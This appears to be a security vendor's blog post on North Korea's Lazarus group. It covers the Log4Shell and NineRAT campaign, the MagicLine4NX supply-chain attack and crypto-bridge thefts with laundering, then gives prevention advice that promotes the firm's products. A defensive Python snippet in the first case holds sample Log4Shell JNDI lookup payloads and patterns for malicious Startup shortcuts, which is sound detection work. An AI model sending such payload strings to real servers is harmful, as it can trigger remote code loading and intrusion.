The Rise of North Korean Cybercrime: How to Secure Your Web3 Development

MetaTrust Labs


It should be noted that security threats and preventive recommendations should be evaluated and customized according to the actual situation and the latest security intelligence.

On January 1, 2024, a hacker attack against Orbit Chain drew the attention of the global cryptocurrency community. According to reports, hackers exploited a vulnerability in Orbit Chain, stealing $81.5 million worth of cryptocurrencies and transferring them to other addresses. Orbit Chain officials have confirmed the incident and said they are working with international law enforcement agencies to track down the attackers' identity and motives. Some security researchers believe that the attack's methods and targets are similar to the style of the North Korean hacker group "Lazarus", which may be another cybercrime by the group. Who is "Lazarus", and why do their activities raise such high alert internationally? How does the group use cryptocurrencies to circumvent international sanctions and anti-money laundering measures?

What is Lazarus?

Lazarus is a well-known hacker group with a North Korean official background that has been operating for more than a decade, since 2009. The group is known for targeting organizations worldwide, and its actions so far include attacks on financial institutions, media, and government agencies. Lazarus Group is controlled by Bureau 121 under the North Korean General Bureau of Reconnaissance. The group is known for attacking banks and cryptocurrency exchanges, obtaining economic benefits by stealing funds and data. Lazarus Group holds its programmers to high standards and encourages people with computer talent to join the official "hacker" ranks.

Pyongyang Automation University is one of the important sources of Lazarus Group hackers. The group has shifted its focus from political attacks to economic attacks, concentrating on the cryptocurrency world. Their activities also include targeting security researchers, embedding malicious code in open-source cryptocurrency platforms, carrying out large-scale cryptocurrency robberies, and spreading malware through fake job interviews. These hacker groups launder illegally obtained funds through the same process traditional cybercrime groups use, and the stolen cryptocurrencies are often converted into fiat currencies to evade anti-money laundering measures.

South Korea, the United States, and Japan have been on high alert for the activities of North Korean hacker groups. It is reported that North Korean hacker groups have successfully stolen $3 billion worth of cryptocurrency funds in the past few years, which have been used to support North Korea's nuclear and ballistic missile programs. Security advisers from the United States, South Korea, and Japan met in Seoul to discuss how to deal with North Korea's cyber risks and announced a new trilateral cooperation initiative, focusing on addressing North Korea's cybercrime and cryptocurrency laundering activities. The meeting was held at a time when tensions on the Korean Peninsula escalated, and North Korea accelerated the expansion of its nuclear weapons and missile programs and publicly demonstrated its attitude of using nuclear weapons preemptively.

The Lazarus hacker group's attack methods and targets are diverse, ranging from SWIFT network attacks on financial institutions to widespread cryptocurrency robberies, demonstrating the group's technical capability and the threat it poses. However, preventive measures against these attacks are relatively few. Since 2018, North Korean hackers have stolen about $2 billion worth of virtual currencies. In 2023 alone, they stole about $200 million worth of cryptocurrencies, accounting for 20% of the stolen funds that year. These hackers pose a continuous threat to the virtual currency ecosystem, and their cyberattack methods keep evolving and becoming more complex.

The scale of North Korean hacker groups' activities exceeds that of other malicious actors by 10 times, and they also target the decentralized financial ecosystem. They use various methods to carry out cyberattacks, including phishing, supply chain attacks, and other forms of hacking. Therefore, enterprises and individual users need to strengthen cybersecurity measures, update software regularly, strengthen password policies, and increase their awareness of cybersecurity. At the same time, regulators also need to strengthen supervision, formulate stricter laws and regulations to curb this kind of cybercrime.

Attack Case 1: Lazarus Uses Log4Shell Vulnerability to Conduct Blacksmith Operation

Attack process and means:

  1. Exploiting the Log4Shell vulnerability: Lazarus first exploited Log4Shell, a remote code execution flaw in the Log4j logging library. Although this vulnerability was discovered and fixed two years ago, many systems still run unpatched versions, which gave Lazarus an entry point.
  2. Proxy tool deployment: Once initial access was gained, Lazarus set up a proxy tool that was used to maintain persistent access on the compromised server. This tool allowed them to run reconnaissance commands, create new administrator accounts, and deploy other credential-stealing tools.
  3. NineRAT deployment: In the second stage, Lazarus deployed the NineRAT malware on the system. NineRAT is a remote access trojan that can collect system information, upgrade itself to new versions, stop execution, uninstall itself, and upload files from the infected computer. It also contains a dropper, which is responsible for establishing persistence and launching the main binary.
  4. DLRAT and BottomLoader usage: Lazarus also used DLRAT and BottomLoader. DLRAT is a trojan and downloader that allows Lazarus to introduce additional payloads on the infected system. BottomLoader is a malware downloader that can fetch and execute payloads from hard-coded URLs.
  5. Credential stealing and persistence: Lazarus used tools such as ProcDump and Mimikatz to dump credentials and obtain more system information. At the same time, by creating URL files in the system's startup directory, they maintained persistence for the updated version of the payload, or for a payload that had been deleted.
  6. Reference links:
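Two detection checks a defender would run for the steps in this case, written as an added example that is not part of the original article: normalizing Log4j lookup obfuscation in web-server log lines to surface JNDI exploitation attempts (step 1), and flagging `.url` files in a Startup folder whose target is a remote URL or a local executable (step 5). The log lines, the `.url` contents, and the 203.0.113.x addresses are constructed samples, not indicators from the article.

```python
import re
from configparser import ConfigParser

# Constructed sample web-server log lines (not from the original article);
# 203.0.113.0/24 is a documentation address range, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-r}mi://203.0.113.10/x}"',
    '10.0.0.4 - - [10/Dec/2021:12:00:04] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.8"',
]

# Log4j lookup obfuscation: ${lower:j} / ${upper:N} -> j / N, and ${::-x} -> x
_NESTED = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:', re.IGNORECASE)

def normalize(s, max_rounds=10):
    """Peel nested lookup obfuscation off a string until it stops changing."""
    for _ in range(max_rounds):
        before = s
        s = _DEFAULT.sub(lambda m: m.group(1), _NESTED.sub(lambda m: m.group(1), s))
        if s == before:
            break
    return s

def find_log4shell_attempts(lines):
    """Return (line_no, scheme, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits

# Startup-folder .url trick: a Windows Internet Shortcut is a plain INI file, so a
# target that is a remote URL or a local executable can be flagged for triage.
_RISKY_TARGET = re.compile(r'^(?:https?|ftp)://|\.(?:exe|dll|bat|cmd|ps1|vbs|js|hta|scr)$', re.IGNORECASE)

def url_shortcut_target(content):
    """Return the URL= target from the text of a .url file, or None if absent."""
    cp = ConfigParser(interpolation=None)
    try:
        cp.read_string(content)
    except Exception:
        return None          # malformed shortcut: not a valid INI file
    return cp.get('InternetShortcut', 'URL', fallback=None)

def is_risky_startup_shortcut(content):
    target = (url_shortcut_target(content) or '').strip()
    return bool(_RISKY_TARGET.search(target))
```

Run `find_log4shell_attempts` over access logs for the exposure window and `is_risky_startup_shortcut` over each `.url` file found in user and all-users Startup folders; both are triage heuristics, so confirm hits against the host before acting.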

Attack Case 2: Lazarus Uses MagicLine4NX Software to Launch Supply Chain Attack

Attack process:

  1. Watering hole attack: Lazarus hacker group infiltrated websites that specific users frequently visit and embedded malicious scripts in them. When users using MagicLine4NX authentication software visited these websites, the embedded code would execute, and the hackers could fully control the system.
  2. Spreading malicious code through a system vulnerability: The hackers exploited a zero-day vulnerability in the MagicLine4NX software, which allowed network-connected personal computers to reach the attackers' internet-facing server. They then used the data synchronization function to spread the malicious code to the business-side server.
  3. Attempting data transfer: The malware tried to establish connections with two C2 servers, one a gateway within the internal network and the other on the external internet. Had the connection succeeded, a large amount of internal network information could have been leaked.

Technical means:

  1. Zero-day vulnerability exploitation: The hackers exploited a zero-day vulnerability in MagicLine4NX software, which was an undisclosed flaw that allowed them to access the target system without authorization.
  2. Supply chain attack: By exploiting the vulnerability in the supply chain, the hackers were able to bypass the normal security measures and directly attack the target system.
  3. Data synchronization and C2 server connection: The hackers used the data synchronization function to spread the malicious code to the business-side server and tried to establish a connection with the external C2 server to further control and steal data.
  4. Reference links:

Attack Case 3: Attacks on Cryptocurrencies

Targets: Cryptocurrency exchanges, wallets, decentralized finance (DeFi) ecosystem

Attack time: Since 2018, especially in 2023

Attack process and technical means:

  1. Exploiting vulnerabilities and leaked private keys: North Korean hackers used phishing and supply chain attacks together with leaked private keys or seed phrases to infiltrate targets.
  2. Cross-chain attacks: They specifically targeted cross-chain bridges, such as the Axie Infinity Ronin Bridge, to steal large amounts of virtual currencies.
  3. Multi-stage money laundering process: North Korean hackers have used a complex "multi-stage money laundering process" in the past to obscure the source and destination of funds. They converted the stolen virtual currencies into different tokens, and then mixed and exchanged them multiple times through automated programs, mixers, and cross-chain swaps, to increase the difficulty of tracking.
  4. Using decentralized exchanges: They exchanged the stolen virtual currencies for Ether through decentralized exchanges, and then mixed and exchanged them multiple times.

Based on the above cases, attackers can steal sensitive data, including confidential business information, customer data, and personal identity information, resulting in privacy breaches and potential legal consequences. Since hackers can fully control the target system, they may obtain a large amount of sensitive information, including the internal data and customer profiles of the enterprise. Lazarus's hacker operations not only caused data leakage and system damage to the victimized organizations, but also may have a serious impact on the victims' business operations.

These attacks usually involve complex supply chain attacks, making prevention and detection more difficult. Attacks may cause financial losses, including the costs of malware removal, data recovery, and system repair, as well as revenue losses due to business interruption. The hackers' attacks resulted in a large amount of virtual currency being stolen, which not only caused economic losses to the victims, but also may expose their personal information and transaction data. Attacks on cross-chain bridges may paralyze the entire system, affecting the normal conduct of transactions.

To cope with such security threats, it is recommended that organizations take the following preventive measures:

  1. Patch vulnerabilities in a timely manner: Ensure that security patches are applied in time to fix known vulnerabilities, especially for software and components used in the supply chain. MetaScan's automated audit function can promptly detect and patch potential vulnerabilities.

  2. Strengthen supply chain security: Establish a secure partnership with supply chain partners, review and verify software and components, and ensure that each link in the supply chain is not attacked by hackers. With MetaScout's monitoring function, you can dynamically update the blacklist and block attacks from potential North Korean hacker addresses.

  3. Security awareness training: Strengthen employee security awareness training. Educate employees on the importance of being alert to watering hole attacks, malicious scripts, and supply chain security, to reduce the impact of human factors on security. Scantist's DevSecOps solution can provide organizations with one-stop security training and guidance.

  4. Network traffic monitoring: Implement network traffic monitoring and intrusion detection and prevention systems (IDS/IPS) to detect abnormal activities and attack behaviors in time. MetaScout's attack blocking mechanism can combine with network traffic monitoring to promptly identify and block hacker attacks on transactions.

  5. Multi-layer defense: Adopt multi-layer defense measures, including firewalls, intrusion detection systems, anti-virus software, etc., to improve the security of the system. MetaScan's Prover function can be used in conjunction with existing security tools and measures, forming a more comprehensive defense system.

  6. Continuous monitoring and response: Establish a security monitoring and response mechanism, monitor network and system activities in real time, detect abnormal behaviors promptly and take appropriate response measures, to minimize the losses caused by attacks. Scantist's component analysis function can continuously monitor the vulnerabilities in the software supply chain and intercept problematic open source and third-party components in time.

  7. Strengthen the security measures of cryptocurrency exchanges and wallets: Cryptocurrency exchanges and wallets should strengthen their security measures, such as using strong passwords, regularly changing private keys, implementing multi-layer security policies, etc. MetaScout's blocking mechanism can provide cryptocurrency exchanges with attack blocking protection based on dynamic blacklists, ensuring the security of users' digital assets.

  8. Regular audits and inspections: Organizations should regularly conduct security audits and inspections of their systems to ensure that no potential security vulnerabilities remain. MetaScan's automated audit function can help organizations conduct a comprehensive security assessment and detect potential vulnerabilities and risks in time.

  9. Raise public awareness: Educate the public about the importance of cybersecurity, and let them know how to protect their digital assets. Organizations can raise public awareness of cybersecurity through publicity campaigns, social media, and other channels, and provide relevant security advice and guidance.

In addition, regular backup and recovery of data, the use of strong passwords and multi-factor authentication, and limiting privileged access are also effective measures to improve security.

About MetaTrust Labs

MetaTrust Labs is a leading security service provider dedicated to creating a secure infrastructure for web 3.0 developers. We provide automated security vulnerability scanning service MetaScan, integrating multiple advanced security scanning engines, to protect all aspects of the application beyond the smart contract layer. In addition, we also provide MetaScout's 24/7 runtime security monitoring service, and MetaScore's comprehensive security and risk assessment service.

Moreover, our Prover tool is a powerful formal verification tool for smart contracts written in the Solidity programming language. It provides rigorous semantic analysis of Solidity code and generates comprehensive verification error reports for effective fault localization. With MetaTrust Labs and our security tools and services, developers can build a secure and reliable web 3.0 development environment, ensuring the security and reliability of their applications.

Twitter: @MetaTrustLabs



About Scantist

Scantist is a solution for code quality management that seamlessly integrates into projects and workflows, ensuring consistent code quality standards. Through integrated policy management, it ensures that the code meets predefined quality standards. Its fast, real-time analysis function provides actionable insights, helping to solve code problems. By integrating with IDEs, it can detect code problems in real time, speeding up the process.

Scantist has comprehensive code evaluation capabilities, which can evaluate the code quality and security of more than 20 languages and frameworks, becoming the central reference for all projects. With more than 5,000 coding rules and extensive program analysis, it provides accurate feedback. Through enterprise-level reporting, it conducts comprehensive risk assessment and monitoring. At the same time, Scantist's solution has customization flexibility and scalability, which can adapt to your unique needs, providing flexible pricing and deep integration, meeting the requirements of enterprises.

Scantist can also easily integrate with top DevOps platforms (such as GitHub, GitLab, Azure, and Bitbucket) and major CI tools, enabling fast project onboarding and continuous code analysis. It simplifies the workflow and improves productivity and efficiency. By supporting developers and DevSecOps teams, Scantist can actively enhance software security, guide component selection, simplify code review, and promote code quality, compliance, and an efficient development process for the development team.

